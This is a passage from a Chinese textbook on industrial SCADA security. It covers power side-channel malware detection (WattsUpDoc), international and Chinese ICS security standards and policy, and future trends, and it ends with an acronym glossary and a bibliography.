现,但是,旁路信道往往会包含有价值的信息。很多可计算设备的全系统耗电量与 其工作负荷成比例关系,WattsUpDoc 技术利用从电源插座测量得到的全系统耗电 量作为电子设备运转行为的测量尺度,完成包括检测病毒在内的被动式异常行为 探测过程。 常规计算机杀毒软件使用标记匹配的方法识别病毒,并识别出未知的代码样 本,这种方法需要一种精确地(而不是推测)将标记为可疑类型的样本匹配至已知病毒的过程。病毒标记匹配法的主要缺陷在于,需要在每种类型的病毒开始传播 之前生成标记,并将标记分发至网络节点。而且,研究人员最近发现基于标记的病 毒扫描技术很容易被已知病毒的简单变种欺骗,导致虚警频发,过多的虚警将导致 破坏性的影响。出于这个原因,再加上标记数据库需要经常在线更新,各国反计算 机病毒研究人员正在积极寻找其他的病毒查杀替代技术。在工业控制系统信息安 全领域,WattsUpDoc 技术是一种典型的基于异常行为的病毒检测技术,它提供了 比商用杀毒软件更精确的查杀能力,而且不需要现场设备用户周期性的更新病 毒库。 WattsUpDoc 技术实时监视全系统的耗电量,使用一种需要跟踪常规和非常规 行为的自适应学习方法识别异常行为,同时该方法可以对进行常规和非常规训练 后的交流电量采集样本进行分类。通过数学统计方法分析整理交流电量样本后, 可以选择一系列时域特征表示交流电信号中发生的异常变化类型。通常任何非预 期的软件工作负荷将给硬件带来额外的工作负担,进而消耗多余的电量并影响特 征 值 。WattsUpDoc 技术能否有效发挥作用取决于将现场设备的采集电量进行样 本训练后,能否准确识别出常规和异常行为[6]。 第7 章 国内外工业SCADA 系统信息 安全发展趋势 7.1 国外工业 SCADA 系统信息安全标准、 指南和规范发展情况 工业控制系统信息安全问题的出现时间不算悠久,世界各国学术界、工业界以 及政府等方面对工业控制系统信息安全问题的认识并不成熟。到本书写作时为 止,先后有国际组织(IEC、ISO、IEEE、ISA)、多边区域性贸易组织、美国、英国、荷 兰、法国、德国、挪威及瑞典等9个国家或国际组织研究或拟订了专门针对工业 SCADA 系统信息安全的规范、标准草案、最佳实践指南/导则等,共计约37个不同 版本。其中较为典型的有《IEC 62351 数据和通信安全》、《IEC 62443 工业测量和 控制过程网络和系统安全》、《ISO/IEC 15408 互联网信息安全评估标准(也称为 “通用标准”)》、《IEEE1711 应用于变电站串行连接的信息安全方面的密码协议 的试用标准》、《ISA 99 制造和控制系统安全标准系列》、《NIST SP 800—82 工业控 制系统信息安全指南系列标准》等。 这些标准中最具代表性、技术界讨论最多的是 IEC 62443,其结构体系如 图7.1所示。IEC 62443—1 系列包含3个标准,主要是常用的定义以及指标。其 中62443-1-1部分主要介绍了安全目标、深度防御、安全上下文、威胁风险评估、 安全程序成熟度、安全等级生命周期、参考模型、资产模型、区域和管道模型以及模 型之间的关系,还包括7个基本要求(FR) 的安全保证等级(SecurityAssurance Level, SAL);62443-1-2 部分主要是本系列标准中使用的术语和缩略语,为了使用方便 都集中到一个标准中;62443-1-3部分主要是系统的安全符合性指标,从7个基 本方面分别介绍了信息安全系统能力的等级,也就是将系统的信息安全能力最终 确定为SAL的4个等级。 IEC 62443—2系列包含了4个标准(使用对象为企业及相关组织,其在建立 系统信息安全及其能力时需要满足的要求):62443-2-1部分介绍了如何在一个运行着的工业自动化控制系统中建立一个信息安全程序,以实现对系统信息的保 护;62443-2-2部分介绍的是如何操作工业自动化和控制系统的信息安全程序, 但是本部分还在草案阶段;62443-2-3部分介绍了在工业自动化和控制系统环 境下如何进行补丁管理,这部分主要是区别于IT 系统环境下的补丁管理。因为IT 环境下的补丁管理不适用于工控环境,这是由两种系统不同特点决定的;62443- 2-4部分介绍了工业自动化和控制系统供应商信息安全策略和规程,分别从系统 管理、系统能力、系统验收以及系统维护方面提出需要满足的要求。 IEC 62443-3部分主要针对系统集成商。62443-3-1部分介绍了当前所用的 各种信息安全工具、保护措施等,以便有效地应用到基于工业控制系统的设施上,从 而规范和监视各种工业系统和关键基础设施;62443-3-2部分描述了在工业自动 化和控制系统环境下,如何进行系统的区域和管道的定义和划分,以及系统在技术实 现时信息安全保证等级的要求。目前本部分也在草案阶段;62443-3-3部分描述 了与7个基本要求(FR) 相关的系统信息安全要求,并且对要实现的系统如何分配系 统信息安全保证等级(SAL) 进行描述,目前本部分已进入到 CDV 阶段。 IEC 62443-4部分主要针对构件供应商。62443-4-1部分介绍了产品开发 时实现信息安全保证的要求;62443-4-2部分描述了工业自动化和控制系统产 品。例如嵌入式设备,基于主机的产品等具体产品在技术实现上的信息安全要求。 但是这两部分标准还在草案阶段。 但是,所有关于工业 SCADA 系统信息安全的规范、标准草案等,存在以下几 方面突出特点: (1)目前关于工业 SCADA 系统信息安全方面的讨论稿、征求意见稿、规范、标 准、指南与导则等,并没有形成体系,尚不能对工业 SCADA 系统信息安全问题提 供完整的、全局性的安全防护解决方案。 (2)大多数规范、标准都处于讨论稿征求意见稿状态,仅有少数几个标准形成 了正式的发布版标准。 (3)工业 SCADA 系统信息安全方面的规范、标准草案、最佳实践指南/导则等 主要由传统 IP 数据网信息安全方面的专家、技术人员及组织起草,工业部门的专 家、技术人员参与较少。 (4)大多数规范、标准草案、最佳实践指南/导则未具体规定或提出工业 SCA- DA 系统信息安全实施环节中的技术细节,如设计专门协议、算法等可操作性、实 用性问题突出。 (5)已经形成的正式发布版标准已经引起了工业界的高度关注,但暂未在实 际的工业 SCADA 系统生产设备、装置和系统中大范围推广应用。 7.2 国内工业控制系统信息安全标准情况 相比国外的情况,国内工业控制系统信息安全标准以及信息安全技术研究工 作起步较晚,国内多个行业组织依据行业特色和优势,正在从多个角度开展工业控 制系统信息安全标准方面的研究与制定工作。截止2012年底,全国信息安全标准 化技术委员会(TC 260)正在编制信息安全技术方面的标准,涉及指标体系、安全 管理基本要求和测评方法等;全国电力系统管理及其信息交换标准化技术委员会 (TC 82)方面发布了几个关于电力系统管理及其信息交换方面的标准:《电力系统 管理及其信息交换数据和通信安全第1部分:通信网络和系统安全安全问题介 绍》(GB/Z25230.1—2010)、《电力系统管理及其信息交换数据和通信安全第3 部分:通信网络和系统安全包括 TCP/IP 的协议集》(GB/Z 25320.3—2010)、《电 力系统管理及其信息交换数据和通信安全第4部分:包含MMS的协议集》(GB/Z 25320.4—2010)、《电力系统管理及其信息交换数据和通信安全第6部分: IEC 61850的安全》(GB/Z 25320.6—2011);全国工业过程测量和控制标准化技术 委员会(TC124) 正在编制工业控制计算机系统、工业控制系统信息安全方面的标 准;全国电力监管标准化技术委员会(TC 296)正在编制有关电力二次系统安全防 护标准以及安全检查方面的标准。 在法律、法规以及政策方面,从2010年开始我国政府开始密切关注工业控制 系统信息安全方面的事态发展,并积极采取相应的预防和防护措施。其中,工业和 信息化部2011 年9月发布《关于加强工业控制系统信息安全管理的通知》 ([2011]451 号),通知明确了工业控制系统信息安全管理的组织领导、技术保障、 规章制度等方面的要求。并在工业控制系统的连接、组网、配置、设备选择与升级、数据、应急管理等六个方面提出了明确的具体要求。文中明确指出:“全国信息安 全标准化技术委员会抓紧制定工业控制系统关键设备信息安全规范和技术标准, 明确设备安全技术要求。” 2012年6月28日国务院《关于大力推进信息化发展和切实保障信息安全的 若干意见(国发〔2012〕23号)》明确要求:保障工业控制系统安全。加强核设施、 航空航天、先进制造、石油石化、油气管网、电力系统、交通运输、水利枢纽、城市设 施等重要领域工业控制系统,定期开展安全检查和风险评估。重点对可能危及生 命和公共财产安全的工业控制系统加强监管。对重点领域使用的关键产品开展安 全测评,实行安全风险和漏洞通报制度。 我国工业控制系统相关的行业/企业方面也积极应对国际工业控制系统信息安 全方面的威胁。电力行业已陆续发布《电力二次系统安全防护规定》、《电力二次系 统安全防护总体要求》等一系列文件。交通铁路系统也发布了TB 10117—98《铁路 电力牵引供电远动系统技术规范》,TB 10064—2002《电力系统综合设计》和《铁路供 电水电调度规则》、《关于强化铁路牵引供电和电力远动系统若干要求》等文件。 从总体上看,我国工业控制系统信息安全防护体系建设明显滞后于工业控制 系统建设,在防护意识、防护策略、防护机制、法规标准、防护检测等方面都存在不 少问题,涉及工业控制系统的信息安全工作尚在起步阶段。急需各方面开展细致 的研究工作,并做好中长期发展规划。 7.3 工业 SCADA 系统网络信息安全发展趋势 在“两化”深度融合的发展背景下,工业控制系统信息安全问题也随之而来。 世界范围内继“震网”病毒事件后又接连发生的几起重大的工业网络安全事件,将 工业网络安全推向了一个新的高度。如何防微杜渐,防止工业控制系统安全事件 的再次发生,在重点能源企业构筑安全的工业控制系统,已经成为政府和企业关注 的热点。 “震网”病毒事件为全球关键基础设施核心要害系统安全问题敲响了警钟。分 析工业 SCADA 系统所遭受的漏洞和攻击,可以看出工业控制系统面临的攻击正向 着简单控制器受攻击增大、利用网络协议进行攻击、专业攻击人员进行攻击、利用病 毒进行攻击、工业控制系统漏洞挖掘与发布同时增长的趋势发展。当前,美国、欧盟 都从国家战略的层面在开展各方面的工作,积极研究工业控制系统信息安全的应对 策略,我国也在政策层面和研究层面积极开展工作,但我国工业控制系统信息安全工 作起步晚,总体上技术研究尚属起步阶段,管理制度不健全,相关标准规范不完善,技 术防护措施不到位,安全防护能力和应急处理能力不高,这些问题都威胁着工业生产 安全和社会正常运作。因此,整合各方面优势资源,促进工业 SCADA 系统信息安全 产业的形成,是未来工业 SCADA 系统网络信息安全发展的基本趋势。 另一方面,工业控制系统信息安全技术的发展,将随着工业自动化系统的发展 而不断演化。目前自动化系统发展的趋势就是数字化、智能化、网络化和人机交互 人性化。同时将更多的IT技术应用到传统的逻辑控制和数字控制中。工业控制 系统信息安全技术未来也将进一步借助传统 IT技术,使其更加智能化、网络化,成 为控制系统的不可缺少的一部分。与传统 IP 互联网的信息安全产品研发路线类 似,工业控制系统信息安全产品将在信息安全与工业生产控制之间找到契合点,形 成工业控制系统特色鲜明的安全输入、安全控制、安全输出类产品体系。值得指出 的是,随着工业控制系统信息安全认识和相关技术的不断深化,必将产生一系列与 工业控制系统功能安全、现场应用环境紧密联系,特色鲜明的工业控制系统安全防 护工具、设备及系统。 缩略语 英文简称 英 文 全 称 中文全称 ACL Access Control List 访问控制列表 ACK Acknowledgement 确认 ADCCP Advanced Data Communications Control Protocol 高级数据通信控制协议 AES Advanced Encryption Standard 高级加密标准 AMI Advanced Metering Infrastructure 电表基础设施 ANSI American National Standard Institute 美国国家标准学会 APT Advanced Persistent Threat 高级持续性威胁 ARP Address Resolution Protocol 地址解析协议 ASDU Application Service Data Unit 应用服务数据单元 ASKMA Advanced SCADA Key Management Architecture 高级SCADA系统的密钥管理体系结构 AV Anti Virus 反病毒软件 AWG American Wire Gauge 美国线规 AWL The Application White List 应用程序白名单 BCH Bose、Ray -Chaudhuri与Hocquenghem 一种用于纠错,特别适用于随机差错 校正的循环检验码。由R . C . Bose、 Chaudhuri和A.Hocquenghem共同提出 BGP Border Gateway Protocol 边界网关协议 CAN Controller Area Network 控制器局域网络 CCE Communication Configuration Enumeration 通信配置列举 CD Compel Data 强制数据 CDV Committee Draft with Vote 委员会草案投票 CERT Computer Emergency Response Team 计算机安全应急响应组 CFR Code of Federal Regulations 联邦法规汇编 CIA Confidentiality Integrity Availability 机密性、完整性、可用性 英文简称 英 文 全 称 中文全称 CIP Critical Infrastructure Protection 重要基础设施保护 CM Configuration Management 配置管理 CPE Common Platform Enumeration 普通平台列举 CPU Central Processing Unit 中央处理器 CRC Cyclical Redundancy Check 循环冗余码 CSMA Carrier Sense Multiple Access 载波侦听多路访问 CSMA/CD Carrier Sense Multiple Access/Collision Detection 载波侦听多路访问/冲突检测 CTS Clear To Send 清除发送 CVE Common Vulnerabilities &Exposures 暴露的脆弱性 CVSS Common Vulnerability Scoring System 脆弱性评分系统 DAM Database Activity Monitoring System 数据库行为监视系统 DCD Data Carrier Detection 数据载波侦听 DCOM Distributed Component Object Model 分布式组件对象模型 DCS Distributed Control System 分布式控制系统 DDL Device Description Language 设备描述语言 DDOS Distributed Denial of Service 分布式拒绝服务攻击 DES Data Encryption Standard 数据加密标准 DFC Data Flow Control 数据流控制位 DHCP Dynamic Host Configuration Protocol 动态主机设置协议 DMZ Demilitarized Zone 堡垒主机区域 DNP Distributed Network Protocol 分布式网络协议 DNS Domain Name System 域名系统 DOS Denial Of Service 拒绝服务 DP Decentralized Periphery 分散外围设备 DRP Disaster Recovery Mechanism 灾难恢复机制 DTE Data Terminal Equipment 数据终端设备 EIA Electronic Industries Association 电子工业协会 EPS number of Events Per Second load 每秒事件负荷数量 ESP Encapsulate Security Payload 封装安全载荷 FAS Fieldbus Access Sublayer 现场总线访问子层 FCB Frame Count Bits 帧计数位 FCV Frame Count Variables 帧计数有效位 FDCC Federal Desktop Core Configuration 联邦桌面核心配置计划 ( 续 ) 英文简称 英 文 全 称 中文全称 FDL Fieldbus Data Link 现场总线数据链路层 FF Foundation Fieldbus 基金会现场总线 FIM File Integrity Monitoring 文件完整性监视 FLC Fieldbus Link Control 现场总线链路控制 FMA Fieldbus Management Layer 现场总线管理 FMS Fieldbus Message Specification 现场总线信息规范 FTP File Transfer Protocol 文件传送输协议 GPRS General Packet Radio Service 通用分组无线服务 HART Highway Addressable Remote Transducer 可寻址远程变送器数据通道协议 HDLC High-level Data Link Control 高级数据链路控制 HIDS Host -based Intrusion Detection System 基于主机型的入侵检测系统 HMAC Hash -based Message Authentication Code 哈希运算消息认证码 HMI Human Machine Interface 人机界面 HSE High Speed Ethernet 高速以太网 HTML Hyper Text Markup Language 超文本标记语言 IAM ldentification and Authentication Management 鉴别和认证管理 IAONA Open organization of Industrial Automation 工业自动化开放组织 ICCP Internal Control Center Communication Protocol 内部控制中心通信协议 ICS Industrial Control Systems 工业控制系统 ICT Information and Communication Technology 信息通信技术 IDS Intrusion Detection Systems 入侵检测系统 IEC International Electrotechnical Commission 国际电工委员会 IED Intelligent Electronic Device 智能电子装置 IETF Internet Engineering Task Force 互联网工程任务组 IND Parameter Index 参数索引 IP Internet Protocol 网际协议 IPS Instruction Prevention System 入侵防护系统 IPSec Internet Protocol Security Intemet协议安全性 ISA Industry Standard Architecture 工业标准构架体系 IS Information Service 信息服务 ITU International Telecommunications Union 国际电信联盟 KDC Key Distribution Center 密钥分发中心 KMA Key Management Architecture 密钥管理体系结构 ( 续 ) 英文简称 英 文 全 称 中文全称 KMC Key Management Center 密钥管理中心 KTC Key Translation Center 密钥转换中心 LAN Local Area Network 局域网 LAS Link Active Secheduler 链路活动调度器 LDAP Lightweight Directory Access Protocol 轻量级目录访问协议 LLI Lower Layer Interface 底层接口 LSDU Link Service Data Unit 连接服务数据单元 MAC Media Access Control 媒体访问控制 MBAP Modbus Application Protocol header Modbus应用协议报文头 MH Ralph Merkle和MartinHellman 研究人员名 MODBUS MODBUS 最初由施耐德电气公司开发的通信协 议,用于可编程控制器之间相互通信,也 可与不同网络上的其他设备进行通信 MPT MPT 警用集群系统标准。MPT-1327信令 是由英国邮电部于1985年正式公布的, 是专用陆地集群移动通信信令标准,定 义了系统控制器(TSC)和移动终端 (RU)之间的空间信令规则,采用专用的 控制信道传输信令 MTU Master Terminal Unit 主站终端单元 NACK Negative Acknowledgment 否定回答 NBAD Anomaly Detection of Network Behavior 网络行为异常检测 NERC North American Electric Reliability Corporation 北美电力可靠性公司 NFS Network File System 网络文件系统 NIDS Network Intrusion Detection System 基于网络的入侵检测系统 NIPS Network Intrusion Prevention System 基于网络的入侵防御系统 NISCC National Infrastructure Security Co-ordination Centre 国家信息基础设施信息安全合作研究中心 NIST National Institute of Standards and Technology 国家标准与技术研究院 NRC American Nuclear Regulatory Commission 美国核能管理委员会 NRZ No Return to Zero 不归零码 NSTB National Security Test Bed 国家信息安全测试床 (续) 英文简称 英 文 全 称 中文全称 NTRU Number Theory Research Unit 数论研究机构 OD Object Dictionary 对象字典 OLE Object Linking and Embedding 对象链接嵌入 OMNET++ Objective Modular Network Testbed In C++ 基于组件的、模块化的、开放的网络仿 真平台,OMNET++作为离散事件仿真 器,具备强大完善的图形界面接口 OPC Object Linking and Embedding (OLE )for Process Control 用于过程控制的对象链接与嵌入技术 OSI Open Systems Interconnection 开放系统互连 OSSIM Open Source Security Information Management System 开源安全信息管理系统 OVAL Open Vulnerability Assessment Language 开放脆弱性评估语言 PA Process Automation 过程自动化 PAC Programmable Automation Controller 可编程自动化控制器 PCN Process Control Network 过程控制网络 PCS Process Control Systen 过程控制系统 PCV Pressure Control Valve 压力调节阀 PDA Personal Digital Assistant 掌上计算机 PDU Protocol Data Unit 协议数据单元 PID Packet Identifier 标志码传输包 PIN Personal Identification Number 个人识别密码 PKI Public Key Infrastructure 公钥基础设施 PLC Programmable Logic Controller 可编程逻辑控制器 PSTN Public Switched Telephone Network 公共交换电话网络 PS/2 Personal System 2 个人系统2 RAM Random Access Memory 随机存储器 RFC Request For Comments 一系列以编号排定的文件 RIP Routing Information Protocol 路由信息协议 RISI Repository of Security Incidents 安全事件信息库 ROM Read -Only Memory 只读存储器 RPC Remote Procedure Call 远程过程调用 缩略语 附 录 ( 续 ) 英文简称 英 文 全 称 中文全称 RSA Ron Rivest、Adi Shamirh和Len Adleman RSA公钥加密算法是1977年由Ron Rivest、Adi Shamirh和Len Adleman在 (美国麻省理工学院)开发的。RSA取 名来自开发他们三者的名字。RSA是目 前最有影响力的公钥加密算法,它能够 抵抗到目前为止已知的所有密码攻击, 已被ISO推荐为公钥数据加密标准 RTU Remote Terminal Unit 远程终端装置 SAL Security Assurance Level 安全保证等级 SCADA Supervisory Control And Data Acquisition 监控与数据采集 SCAP Security Content Automation Protocol 安全内容自动化协议 SCP Secure Copy Protocol 安全拷贝协议 SDEE Security Device Event Exchange 安全设备事件交换协议 SDLC Software Development Life Cycle 软件生命周期 SEM Security Event Management System 安全事件管理系统 SFTP Secure File Transfer Protocol 安全文件传送协议 SIEM Security Information and Event Management 信息安全和事件管理 SKE SCADA Key Emerge SCADA系统的密钥初始化方法 SKMA SCADA Key Management Architecture SCADA系统的密钥管理体系结构 SMTP Simple Mail Transfer Protocol 简单邮件传输协议 SNMP Simple Network Management Protocol 简单网络管理协议 SQL Structured Query Language 结构化查询语言 SSID Service Set Identifier 服务集标识 SSL Secure Socket Layer 安全套接层 SYSLOG SYSLOG 系统日志或系统记录 TCP Transmission Control Protocol 传输控制协议 TCP SYN Transmission Control Protocol Synchronous TCP/IP建立连接时使用的握手信号 TFN Tribe Flood Network 簇群式泛洪攻击 TFTP Trivial File Transfer Protocol 简单文件传输协议 TLS Transport Layer Security 安全传输协议 TSDU Transport Service Data Unit 传输服务数据单元 TTL Time To Live 生存时间 UDP User Datagram Protocol 用户数据报协议 USB Universal Serial Bus 通用串行总线 ( 续 ) 英文简称 英 文 全 称 中文全称 UTM Unified Threat Management 统一威胁管理 VFD Virtual Field Device 虚拟现场设备 VFD Variable Frequency Drive 可变频率驱动 VHF Very High Frequency 甚高频 VLAN Virtual Local Area Network 虚拟局域网 VPN Virtual Private Network 虚拟专用网络 WAN Wide Area Network 广域网 WFP Windows File Protection Windows文件保护 WMI Windows Management Instrumentation Windows管理规范 WORM Write Once Read Many 一次写入多次可读 WPA WiFi Protected Access WiFi网络安全接入 XCCDF Extended Configuration List Description Format 扩展配置清单描述格式 XML Extensible Markup Language 可扩展标记性语言 参 考 文 献 [1]刘晓雪,陈茂贤,李博恺,等。网电空间战一对国家安全的下一个威胁及应对措施[M]. 北 京:国防工业出版社,2011年5月. [2]Stouffer Keith,Falco Joe,Kent Karen.Guide to Supervisory Control and Data Acquisition(SCA- DA)and Industrial Control Systems Security -Recommendations of the National Institute of Standards and Technology[M],USA:NIST(美国国家标准局),2006. [3]Gordon Clarke CP Eng.Practical Modern SCADA Protocols:DNP3,60870.5 and Related Systems [M],Australia;Elsevier Inc. [4]David Bailey BEng,et al Practical SCADA for Industry[M],Australia:Elsevier Inc,2003. [5]Igor Nai Fovino,et al Taxonomy of security solutions for the SCADA sector[M],EUROPEAN UNION:JRC -Joint Research Centre of the European Commission,2010. [6]Eric D Knapp,et al Industrial Network Security -Securing Critical Infrastructure Networks for Smart Grid,SCADA,and Other Industrial Control Systems[M].USA:Elsevier Inc,2011. [7]Blume R,Hovd B,Pollet J.Supervisory Control and Data Acquisition(SCADA)Systems Security Guide[R].USA:Electric Power Research Institute(EPRI),Inc,2003. [8]Frazer,Roy.Process Measurement and Control—Introduction to Sensors,Communication Adjust- ment,and Control[M],Prentice -Hall,Inc.,2001. [9]Shane S.Clark,Benjamin Ransford,Amir Rahmati,Shane Guineau,Jacob Sorber,Kevin Fu,and Wenyuan Xu.Watts UpDoc:Power Side Channels to Nonintrusively Discover Untargeted Malware on Embedded Medical Devices[C].Presentation by USENIX for HealthTech’13,August 12,2013. [10]Falco,Joe,et al.,IT Security for Industrial Control Systems[OL],NIST IR 6859,2003,http:// www.isd.mel.nist.gov/documents/falco/ITSecurityProcess.pdf. [11]Bailey,David,and Wright,Edwin.Practical SCADA for Industry[M],IDC Technologies,2003. [12]Stuart A Boyer.SCADA Supervisory Control and Data Acquisition[M].2nd Edition.USA:Inter- national Society of Automation,2009. [13]AGA-12,Cryptographic Protection of SCADA Communications,Part 1:Background,Policies and Test Plan[OL].September,2005,http://www.gtiservices.org/security/AGA12_partl _ draft6.pdf. [14]Luyben,William L Plant Wide Process Control[M].New York:McGraw Hill,1998. [15]Berge Jonas.Fieldbuses for Process Control:Engineering,Operation,and Maintenance[M].USA: International Society of Automation,2002. [16]Peerenboom,James.Infrastructure Interdependencies:Overview of Concepts and Terminology [OL].Argonne National Laboratory.http://www.pnwer.org/pris/peerenboom_pdf.pdf. [17]Rinaldi,et al.Identifying,Understanding,and Analyzing Critical Infrastructure Interdependencies [OL].IEEE Control Systems Magazine,2001,http://www.ce.cmu.edu/~hsm/im2004/read- ings/CIⅡ-Rinaldi.pdf. [18]GAO-04-354.Critical Infrastructure Protection:Challenges and Efforts to Secure Control Sys- tems[OL].U.S.GAO,2004,http://www.gao.gov/new.items/d04354.pdf. [19]Weiss,Joseph.Current Status of Cyber Security of Control Systems[R].Georgia:Presentation to Georgia Tech Protective Relay Conference,May 8,2003. [20]Keeney,Michelle,et al.Insider Threat Study:Computer System Sabotage in Critical Infrastructure Sectors[OL]United States Secret Service and Carnegie Mellon Software Institute,2005,http:// www.cert.org/archive/pdf/insidercross051105.pdf. [21]Federal Information Security Management Act of 2002,Section 301:Information Security[OL]. http://csrc.nist.gov/policies/FISMA-final.pdf. [22]Federal Information Processing Standards Publication:FIPS 199.Standards for Security Categori- zation of Federal Information Systems[S].NIST,2004,http://csrc.nist.gov/publications/fips/ fips199/FIPS-PUB-199-final.pdf. [23]Federal Information Processing Standards Publication:FIPS 200.Minimum Security Require- ments for Federal Information Systems[S].NIST,2005,http://csrc.nist.gov/publications/ drafts/FIPS -200-ipd -07 -13-2005.pdf. [24]Protecting Industrial Control Systems—Annex III.ICS Security Related Standards,Guidelines and Policy Documents[R].European Union(EU):European Network and Information Security Agency(ENISA),2011. [25]IEC/TR 62443-3-1,Industrial communication networks—Network and system security—Part 3-1:Security technologies for industrial automation and control systems[S]. [26]ANSI/ISA-99.00.01-2007,Security for Industrial Automation and Control Systems—Part 1: Terminology,Concepts,and Models[S]. [27]ANSI/ISA-99.02.01-2009,Security for Industrial Automation and Control Systems:Establis- hing an Industrial Automation and Control Systems Security Program[S]. [28]BS IEC 62443-2-1:2011,Industrial communication networks—Network andsystem security[S]. [29]IEC/PAS 62443-3,Security for industrial process measurement and control—Network and sys- tem Security[S]. [30]IEC/TS 62443-1-1,Industrial communication networks—Network and system security—Part 1-1:Terminology,concepts and models[S]. [31]EricJByres,Matthew Franz,Darrin Miller.The Use of Attack Trees in Assessing Vulnerabilities in SCADA Systems[J].Lisbon,Portugal,IEEE:2004. [32]Larson J.Control systems at risk:sophisticated penetration testers show how to get through the defenses[C].in:Proc.2009 SANS European SCADA and Process Control Security Summit,Oc- tober,2009. [33]McConnell A,Cajina M,Peterson D.Security and reliability of wireless LAN protocol stacks used in control systems[C].in:Proc.SCADA Security Scientific Symposium(S4),Kenexis Security Corporation,2010,Digital Bond Press. 参 考 文 献 [34]Pollet J,Tiger R.Electricity for free The dirty underbelly of SCADA and Smart Meters[C].in: Proc.2010 BlackHat Technical Conference,July,2010. [35]Spaanjaars I.Regular expression for a strong password,[OL].http://imar.spaanjaars.com/ 297/regular-expression-for-a-strong-password,May 14,2004(cited:March 15,2011). [36]Butler JM.Benchmarking security information event management(SIEM)[R].The SANS Insti- tute Analytics Program[R].February,2009. [37]Swanson,Marianne,et al.NIST SP 800-18,Guide for Developing Security Plans for Federal In- formation Systems[OL],Revision 1,2006,http://csrc.nist.gov/publications/nistpubs/800-18- Rev1/sp800-18-Rev1-final.pdf. [38]Swanson,Marianne.NIST SP 800-26,Security Self -Assessment Guide for Information Technol- ogy Systems[S].2001,http://csrc.nist.gov/publications/nistpubs/800-26/sp800-26.pdf. [39]Stoneburner,Gary,et al.NIST SP 800-30,Risk Management for Information Technology Systems [S].2002,http://csrc.nist gov/publications/nistpubs/800-30/sp800 -30.pdf. [40]Ross,Ron,et al.NIST SP 800-37,Guide for the Security Certification and Accreditation of Fed- eral Information Systems[S].2004,http://csrc.nist.gov/publications/nistpubs/800 -37/ SP800-37-final.pdf. [41]Ross,Ron,et al.NIST SP 800-53,Recommended Security Controls for Federal Information Sys- tems[S].2005,http://csrc.nist.gov/publications/nistpubs/800-53/SP800-53.pdf. [42]Ross,Ron,et al.NIST SP 800-53A,Guide for Assessing the Security Controls in Federal Infor- mation Systems[S].http://csrc.nist.gov/publications/nistpubs/800-53/SP800-53.pdf. [43]Barker,William.NIST SP 800-59,Guideline for Identifying an Information System as a National Security System[S].2003,http://csrc.nist.gov/publications/nistpubs/800-59/SP800-59.pdf. [44]Barker,William.NIST SP 800-60 Version 2.0,Guide for Mapping Types of Information and In- formation systems to Security Categories[S].2004,http://csrc.nist.gov/publications/nistpubs/ 800-60/SP800-60V1-final.pdf. [45]Souppaya,Murugiah,et al.NIST SP 800-70,Security Configuration Checklists Program for IT Products -Guidance for Checklists Users and Developers[S].2005,http://csrc.nist.gov/ checklists/docs/SP_800-70_20050526.pdf. [46]Bowen,Pauline,et al.NIST SP 800-100,Information Security Handbook:A Guide for Managers [S].2006,http://csrc.nist.gov/publications/drafts.html#sp800 -100. [47]TR99.00.02:Integrating Electronic Security into the Manufacturing and Control Systems Envi- ronment[J].International Society of Automation,2004. [48]NIST Security Configurations Checklists Program for IT Products[S].http://checklists.nist.gov/ [49]Stamp,Jason,et al.Common Vulnerabilities in Critical Infrastructure Control Systems[OL].San- dia National Laboratories,2003,http://www.sandia.gov/iorta/docs/SAND2003-1772C_Com- mon_Vulnerabilities_CI_Controll.pdf. [50]SCADA Security -Advice for CEOs,IT Security Expert Advisory Group(ITSEAG)[OL]. htp://www.ag,gov.au/agd/WWW/rwpattach.nsf/VAP/(930C12A9101F61D43493D44C70E- 84EAA)~SCADA+Security.pdf/$file/SCADA +Security.pdf [51]Franz Matthew.Vulnerability Testing of Industrial Network Devices,Critical Infrastructure Assur- ance Group[OL].Cisco Systems,2003,http://www.scadasec.net/oldio/papers/franz -isa - device -testing-oct03.pdf. [52]Duggan,David,et al.Penetration Testing of Industrial Control Systems[OL].Sandia National La- boratories,Report No SAND2005 -2846P,2005,htp://www.sandia.gov/scada/documents/ sand_2005_2846p.pdf. [53]21 Steps to Improve Cyber Security of SCADA Networks[OL].Ofice of Energy Assurance, U.S.Department of Energy,http://www.oe.netl.doe.gov/docs/prepare/21stepsbooklet.pdf. [54]TR99.00.01:Security Technologies for Manufacturing and Control Systems[S].International Society of Automation,2004. [55]NISCC Good Practice Guide on Firewall Deployment for SCADA and Process Control Networks [OL].London:National Infrastructure Security Coordination Centre,2005,http://www.niscc. gov.uk/niscc/docs/re-20050223-00157.pdf. [56]Idaho National Laboratory.Control Systems Cyber Security:Defense in Depth Strategies,Home- land Security External Report #INL/EXT-06-11478[OL].May 2006,http://csrp.inl.gov/ Documents/Defense%20in%20Depth%20Strategies.pdf. [57]The IAONA Handbook for Network Security—Draft/RFC v0.4[C].Magdeburg,Germany:Indus- trial Automation Open Networking Association(IAONA),2003. [58]Idaho National Laboratory.Common Control System Vulnerability,Homeland Security External Report #INL/EXT-05-00993[OL].November 2005,www.us -cert.gov/control_systems/ pdf/csvull105.pdf. [59]Roback,Edward.NIST SP 800-23,Guidelines to Federal Organizations on Security Assurance and Acquisition/Use of Tested/Evaluated Products[S].2000,http://csrc.nist gov/publica- tions/nistpubs/800 -23/sp800-23.pdf. [60]Stoneburner,Gary,et al.NIST SP 800-27,Engineering Principles for Information Security(A Baseline for Achieving Security),Revision A[S].2004,http://csrc.nist.gov/publications/nist- pubs/800-27A/SP800-27 -RevA.pdf. [61]Grance,Tim,et al.NIST SP 800-35,Guide to Information Technology Security Services[S]. 2003,http://csrc.nist.gov/publications/nistpubs/800-35/NIST-SP800-35.pdf. [62]Grance,Tim,et al.NIST SP 800-36,Guide to Selecting Information Technology Security Prod- ucts[S].2003,http://csrc.nist.gov/publications/nistpubs/800-36/NIST-SP800-36.pdf. [63]Grance,Tim,et al.NIST SP 800-64,Security Considerations in the Information System Develop- ment Life Cycle,Revision 1[S].2004,http://csrc.nist.gov/publications/nistpubs/800-64/ NIST-SP800-64.pdf. [64]Hash,Joan.NIST SP 800-65,Integrating IT Security into the Capital Planning and Investment Control Process[S].2005,http://csrc.nist.gov/publications/nistpubs/800-65/SP-800-65- Final.pdf. [65]Carlos Queiroz.Building a SCADA Security Testbed[C].2009 Third International Conference on Network and System Security.
standards
